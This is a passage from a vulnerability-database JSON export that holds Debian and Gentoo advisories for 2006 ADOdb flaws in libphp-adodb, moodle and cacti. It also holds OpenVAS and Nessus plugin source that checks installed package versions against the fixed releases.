https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201029-1\";\ntag_summary = \"The remote host is missing an update to libphp-adodb\nannounced via advisory DSA 1029-1.\n\nSeveral vulnerabilities have been discovered in libphp-adodb, the 'adodb'\ndatabase abstraction layer for PHP. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2006-0146\n\nAndreas Sandblad discovered that improper user input sanitisation\nresults in a potential remote SQL injection vulnerability enabling\nan attacker to compromise applications, access or modify data, or\nexploit vulnerabilities in the underlying database implementation.\nThis requires the MySQL root password to be empty. It is fixed by\nlimiting access to the script in question.\n\nCVE-2006-0147\n\nA dynamic code evaluation vulnerability allows remote attackers to\nexecute arbitrary PHP functions via the 'do' parameter.\n\nCVE-2006-0410\n\nAndy Staudacher discovered an SQL injection vulnerability due to\ninsufficient input sanitising that allows remote attackers to\nexecute arbitrary SQL commands.\n\nCVE-2006-0806\n\nGulfTech Security Research discovered multiple cross-site\nscripting vulnerabilities due to improper user-supplied input\nsanitisation. Attackers can exploit these vulnerabilities to\ncause arbitrary scripts to be executed in the browser of an\nunsuspecting user's machine, or result in the theft of\ncookie-based authentication credentials.\n\nFor the old stable distribution (woody) these problems have been fixed in\nversion 1.51-1.2.\";\n\n\nif(description)\n{\n script_id(56535);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-0146\", \"CVE-2006-0147\", \"CVE-2006-0410\", \"CVE-2006-0806\");\n script_bugtraq_id(16187,16364,16720);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1029-1 (libphp-adodb)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libphp-adodb\", ver:\"1.51-1.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libphp-adodb\", ver:\"4.52-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0410", "CVE-2006-0806", "CVE-2006-0147", "CVE-2006-0146"], "description": "The remote host is missing an update to moodle\nannounced via advisory DSA 1030-1.\n\nSeveral vulnerabilities have been discovered in libphp-adodb, the\n'adodb' database abstraction layer for PHP, which is embedded in\nmoodle, a course management system for online learning. The Common\nVulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2006-0146\n\nAndreas Sandblad discovered that improper user input sanitisation\nresults in a potential remote SQL injection vulnerability enabling\nan attacker to compromise applications, access or modify data, or\nexploit vulnerabilities in the underlying database implementation.\nThis requires the MySQL root password to be empty. It is fixed by\nlimiting access to the script in question.\n\nCVE-2006-0147\n\nA dynamic code evaluation vulnerability allows remote attackers to\nexecute arbitrary PHP functions via the 'do' parameter.\n\nCVE-2006-0410\n\nAndy Staudacher discovered an SQL injection vulnerability due to\ninsufficient input sanitising that allows remote attackers to\nexecute arbitrary SQL commands.\n\nCVE-2006-0806\n\nGulfTech Security Research discovered multiple cross-site\nscripting vulnerabilities due to improper user-supplied input\nsanitisation. Attackers can exploit these vulnerabilities to\ncause arbitrary scripts to be executed in the browser of an\nunsuspecting user's machine, or result in the theft of\ncookie-based authentication credentials.\n\nThe old stable distribution (woody) does not contain moodle packages.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56536", "href": "http://plugins.openvas.org/nasl.php?oid=56536", "type": "openvas", "title": "Debian Security Advisory DSA 1030-1 (moodle)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1030_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1030-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 1.4.4.dfsg.1-3sarge1.\n\nFor the unstable distribution these problems will be fixed soon.\n\nWe recommend that you upgrade your moodle package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201030-1\";\ntag_summary = \"The remote host is missing an update to moodle\nannounced via advisory DSA 1030-1.\n\nSeveral vulnerabilities have been discovered in libphp-adodb, the\n'adodb' database abstraction layer for PHP, which is embedded in\nmoodle, a course management system for online learning. The Common\nVulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2006-0146\n\nAndreas Sandblad discovered that improper user input sanitisation\nresults in a potential remote SQL injection vulnerability enabling\nan attacker to compromise applications, access or modify data, or\nexploit vulnerabilities in the underlying database implementation.\nThis requires the MySQL root password to be empty. It is fixed by\nlimiting access to the script in question.\n\nCVE-2006-0147\n\nA dynamic code evaluation vulnerability allows remote attackers to\nexecute arbitrary PHP functions via the 'do' parameter.\n\nCVE-2006-0410\n\nAndy Staudacher discovered an SQL injection vulnerability due to\ninsufficient input sanitising that allows remote attackers to\nexecute arbitrary SQL commands.\n\nCVE-2006-0806\n\nGulfTech Security Research discovered multiple cross-site\nscripting vulnerabilities due to improper user-supplied input\nsanitisation. Attackers can exploit these vulnerabilities to\ncause arbitrary scripts to be executed in the browser of an\nunsuspecting user's machine, or result in the theft of\ncookie-based authentication credentials.\n\nThe old stable distribution (woody) does not contain moodle packages.\";\n\n\nif(description)\n{\n script_id(56536);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-0146\", \"CVE-2006-0147\", \"CVE-2006-0410\", \"CVE-2006-0806\");\n script_bugtraq_id(16187,16364,16720);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1030-1 (moodle)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"moodle\", ver:\"1.4.4.dfsg.1-3sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:01", "bulletinFamily": "unix", "cvelist": ["CVE-2006-0410", "CVE-2006-0806", "CVE-2006-0147", "CVE-2006-0146"], "description": "### Background\n\nCacti is a complete web-based frontend to rrdtool. ADOdb is a PHP-based database abstraction layer which is included in Cacti. \n\n### Description\n\nSeveral vulnerabilities have been identified in the copy of ADOdb included in Cacti. Andreas Sandblad discovered a dynamic code evaluation vulnerability (CVE-2006-0147) and a potential SQL injection vulnerability (CVE-2006-0146). Andy Staudacher reported another SQL injection vulnerability (CVE-2006-0410), and Gulftech Security discovered multiple cross-site-scripting issues (CVE-2006-0806). \n\n### Impact\n\nRemote attackers could trigger these vulnerabilities by sending malicious queries to the Cacti web application, resulting in arbitrary code execution, database compromise through arbitrary SQL execution, and malicious HTML or JavaScript code injection. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Cacti users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/cacti-0.8.6h_p20060108-r2\"", "edition": 1, "modified": "2006-04-14T00:00:00", "published": "2006-04-14T00:00:00", "id": "GLSA-200604-07", "href": "https://security.gentoo.org/glsa/200604-07", "type": "gentoo", "title": "Cacti: Multiple vulnerabilities in included ADOdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-07T10:52:02", "description": "The remote host is affected by the vulnerability described in GLSA-200604-07\n(Cacti: Multiple vulnerabilities in included ADOdb)\n\n Several vulnerabilities have been identified in the copy of ADOdb\n included in Cacti. Andreas Sandblad discovered a dynamic code\n evaluation vulnerability (CVE-2006-0147) and a potential SQL injection\n vulnerability (CVE-2006-0146). Andy Staudacher reported another SQL\n injection vulnerability (CVE-2006-0410), and Gulftech Security\n discovered multiple cross-site-scripting issues (CVE-2006-0806).\n \nImpact :\n\n Remote attackers could trigger these vulnerabilities by sending\n malicious queries to the Cacti web application, resulting in arbitrary\n code execution, database compromise through arbitrary SQL execution,\n and malicious HTML or JavaScript code injection.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2006-04-17T00:00:00", "title": "GLSA-200604-07 : Cacti: Multiple vulnerabilities in included ADOdb", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0410", "CVE-2006-0806", "CVE-2006-0147", "CVE-2006-0146"], "modified": "2006-04-17T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:cacti"], "id": "GENTOO_GLSA-200604-07.NASL", "href": "https://www.tenable.com/plugins/nessus/21231", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200604-07.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21231);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-0146\", \"CVE-2006-0147\", \"CVE-2006-0410\", \"CVE-2006-0806\");\n script_xref(name:\"GLSA\", value:\"200604-07\");\n\n script_name(english:\"GLSA-200604-07 : Cacti: Multiple vulnerabilities in included ADOdb\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200604-07\n(Cacti: Multiple vulnerabilities in included ADOdb)\n\n Several vulnerabilities have been identified in the copy of ADOdb\n included in Cacti. Andreas Sandblad discovered a dynamic code\n evaluation vulnerability (CVE-2006-0147) and a potential SQL injection\n vulnerability (CVE-2006-0146). Andy Staudacher reported another SQL\n injection vulnerability (CVE-2006-0410), and Gulftech Security\n discovered multiple cross-site-scripting issues (CVE-2006-0806).\n \nImpact :\n\n Remote attackers could trigger these vulnerabilities by sending\n malicious queries to the Cacti web application, resulting in arbitrary\n code execution, database compromise through arbitrary SQL execution,\n and malicious HTML or JavaScript code injection.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200604-07\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Cacti users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/cacti-0.8.6h_p20060108-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(89);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/04/17\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-analyzer/cacti\", unaffected:make_list(\"ge 0.8.6h_p20060108-r2\"), vulnerable:make_list(\"lt 0.8.6h_p20060108-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Cacti\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:44:32", "description": "Several vulnerabilities have been discovered in libphp-adodb, the\n'adodb' database abstraction layer for PHP. The Common Vulnerabilities\nand Exposures project identifies the following problems :\n\n - CVE-2006-0146\n Andreas Sandblad discovered that improper user input\n sanitisation results in a potential remote SQL injection\n vulnerability enabling an attacker to compromise\n applications, access or modify data, or exploit\n vulnerabilities in the underlying database\n implementation. This requires the MySQL root password to\n be empty. It is fixed by limiting access to the script\n in question.\n\n - CVE-2006-0147\n A dynamic code evaluation vulnerability allows remote\n attackers to execute arbitrary PHP functions via the\n 'do' parameter.\n\n - CVE-2006-0410\n Andy Staudacher discovered a SQL injection vulnerability\n due to insufficient input sanitising that allows remote\n attackers to execute arbitrary SQL commands.\n\n - CVE-2006-0806\n GulfTech Security Research discovered multiple\n cross-site scripting vulnerabilities due to improper\n user-supplied input sanitisation. Attackers can exploit\n these vulnerabilities to cause arbitrary scripts to be\n executed in the browser of an unsuspecting user's\n machine, or result in the theft of cookie-based\n authentication credentials.", "edition": 28, "published": "2006-10-14T00:00:00", "title": "Debian DSA-1029-1 : libphp-adodb - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0410", "CVE-2006-0806", "CVE-2006-0147", "CVE-2006-0146"], "modified": "2006-10-14T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:libphp-adodb"], "id": "DEBIAN_DSA-1029.NASL", "href": "https://www.tenable.com/plugins/nessus/22571", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1029. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22571);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-0146\", \"CVE-2006-0147\", \"CVE-2006-0410\", \"CVE-2006-0806\");\n script_bugtraq_id(16187, 16364, 16720);\n script_xref(name:\"DSA\", value:\"1029\");\n\n script_name(english:\"Debian DSA-1029-1 : libphp-adodb - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in libphp-adodb, the\n'adodb' database abstraction layer for PHP. The Common Vulnerabilities\nand Exposures project identifies the following problems :\n\n - CVE-2006-0146\n Andreas Sandblad discovered that improper user input\n sanitisation results in a potential remote SQL injection\n vulnerability enabling an attacker to compromise\n applications, access or modify data, or exploit\n vulnerabilities in the underlying database\n implementation. This requires the MySQL root password to\n be empty. It is fixed by limiting access to the script\n in question.\n\n - CVE-2006-0147\n A dynamic code evaluation vulnerability allows remote\n attackers to execute arbitrary PHP functions via the\n 'do' parameter.\n\n - CVE-2006-0410\n Andy Staudacher discovered a SQL injection vulnerability\n due to insufficient input sanitising that allows remote\n attackers to execute arbitrary SQL commands.\n\n - CVE-2006-0806\n GulfTech Security Research discovered multiple\n cross-site scripting vulnerabilities due to improper\n user-supplied input sanitisation. Attackers can exploit\n these vulnerabilities to cause arbitrary scripts to be\n executed in the browser of an unsuspecting user's\n machine, or result in the theft of cookie-based\n authentication credentials.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=349985\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=358872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0146\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0147\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1029\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libphp-adodb package.\n\nFor the old stable distribution (woody) these problems have been fixed\nin version 1.51-1.2.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 4.52-1sarge1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(89);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libphp-adodb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"libphp-adodb\", reference:\"1.51-1.2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libphp-adodb\", reference:\"4.52-1sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:44:32", "description": "Several vulnerabilities have been discovered in libphp-adodb, the\n'adodb' database abstraction layer for PHP, which is embedded in\nmoodle, a course management system for online learning. The Common\nVulnerabilities and Exposures project identifies the following\nproblems :\n\n - CVE-2006-0146\n Andreas Sandblad discovered that improper user input\n sanitisation results in a potential remote SQL injection\n vulnerability enabling an attacker to compromise\n applications, access or modify data, or exploit\n vulnerabilities in the underlying database\n implementation. This requires the MySQL root password to\n be empty. It is fixed by limiting access to the script\n in question.\n\n - CVE-2006-0147\n A dynamic code evaluation vulnerability allows remote\n attackers to execute arbitrary PHP functions via the\n 'do' parameter.\n\n - CVE-2006-0410\n Andy Staudacher discovered a SQL injection vulnerability\n due to insufficient input sanitising that allows remote\n attackers to execute arbitrary SQL commands.\n\n - CVE-2006-0806\n GulfTech Security Research discovered multiple\n cross-site scripting vulnerabilities due to improper\n user-supplied input sanitisation. Attackers can exploit\n these vulnerabilities to cause arbitrary scripts to be\n executed in the browser of an unsuspecting user's\n machine, or result in the theft of cookie-based\n authentication credentials.", "edition": 28, "published": "2006-10-14T00:00:00", "title": "Debian DSA-1030-1 : moodle - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0410", "CVE-2006-0806", "CVE-2006-0147", "CVE-2006-0146"], "modified": "2006-10-14T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:moodle"], "id": "DEBIAN_DSA-1030.NASL", "href": "https://www.tenable.com/plugins/nessus/22572", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1030. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22572);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-0146\", \"CVE-2006-0147\", \"CVE-2006-0410\", \"CVE-2006-0806\");\n script_bugtraq_id(16187, 16364, 16720);\n script_xref(name:\"DSA\", value:\"1030\");\n\n script_name(english:\"Debian DSA-1030-1 : moodle - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in libphp-adodb, the\n'adodb' database abstraction layer for PHP, which is embedded in\nmoodle, a course management system for online learning. The Common\nVulnerabilities and Exposures project identifies the following\nproblems :\n\n - CVE-2006-0146\n Andreas Sandblad discovered that improper user input\n sanitisation results in a potential remote SQL injection\n vulnerability enabling an attacker to compromise\n applications, access or modify data, or exploit\n vulnerabilities in the underlying database\n implementation. This requires the MySQL root password to\n be empty. It is fixed by limiting access to the script\n in question.\n\n - CVE-2006-0147\n A dynamic code evaluation vulnerability allows remote\n attackers to execute arbitrary PHP functions via the\n 'do' parameter.\n\n - CVE-2006-0410\n Andy Staudacher discovered a SQL injection vulnerability\n due to insufficient input sanitising that allows remote\n attackers to execute arbitrary SQL commands.\n\n - CVE-2006-0806\n GulfTech Security Research discovered multiple\n cross-site scripting vulnerabilities due to improper\n user-supplied input sanitisation. Attackers can exploit\n these vulnerabilities to cause arbitrary scripts to be\n executed in the browser of an unsuspecting user's\n machine, or result in the theft of cookie-based\n authentication credentials.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=349985\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=358872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0146\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0147\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1030\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the moodle package.\n\nThe old stable distribution (woody) does not contain moodle packages.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.4.4.dfsg.1-3sarge1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(89);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"moodle\", reference:\"1.4.4.dfsg.1-3sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:44:32", "description": "Several vulnerabilities have been discovered in libphp-adodb, the\n'adodb' database abstraction layer for PHP, which is embedded in\ncacti, a frontend to rrdtool for monitoring systems and services. The\nCommon Vulnerabilities and Exposures project identifies the following\nproblems :\n\n - 